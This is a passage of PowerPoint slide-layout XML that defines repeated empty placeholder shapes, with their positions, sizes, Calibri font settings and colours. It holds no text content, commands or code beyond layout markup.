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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="100580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34" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="10058040" cy="54468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97280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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37" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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38" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="505008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39" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="323856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42" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498200" y="4453200"/>
            <a:ext cx="323856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43" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899120" y="4453200"/>
            <a:ext cx="323856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44" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="323856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45" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498200" y="5050080"/>
            <a:ext cx="323856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46" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899120" y="5050080"/>
            <a:ext cx="3238560" cy="54468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1097280" y="758880"/>
            <a:ext cx="10058040" cy="356580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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="10058040" cy="1142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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="10058040" cy="114264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097280" y="758880"/>
            <a:ext cx="10058040" cy="356580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1097280" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="4453200"/>
            <a:ext cx="4908240" cy="114264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1097280" y="758880"/>
            <a:ext cx="10058040" cy="35658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1097280" y="2165760"/>
            <a:ext cx="10058040" cy="137160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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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66" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="505008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1097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="10058040" cy="1142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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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71" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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74" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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75" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="10058040" cy="54468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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="100580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78" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="10058040" cy="54468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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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81" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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82" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="505008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83" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="323856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86" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498200" y="4453200"/>
            <a:ext cx="323856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87" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899120" y="4453200"/>
            <a:ext cx="323856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88" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5050080"/>
            <a:ext cx="323856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89" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498200" y="5050080"/>
            <a:ext cx="323856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90" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899120" y="5050080"/>
            <a:ext cx="3238560" cy="54468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1097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="10058040" cy="1142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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="10058040" cy="114264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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="4453200"/>
            <a:ext cx="4908240" cy="114264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1097280" y="758880"/>
            <a:ext cx="10058040" cy="35658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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="10058040" cy="114264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1097280" y="2165760"/>
            <a:ext cx="10058040" cy="137160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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="445320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113" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4453200"/>
            <a:ext cx="4908240" cy="1142640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="445320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118" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251400" y="505008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097280" y="758880"/>
            <a:ext cx="10058040" cy="3565800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="PlaceHolder 2"/>
          <p:cNvSpPr>
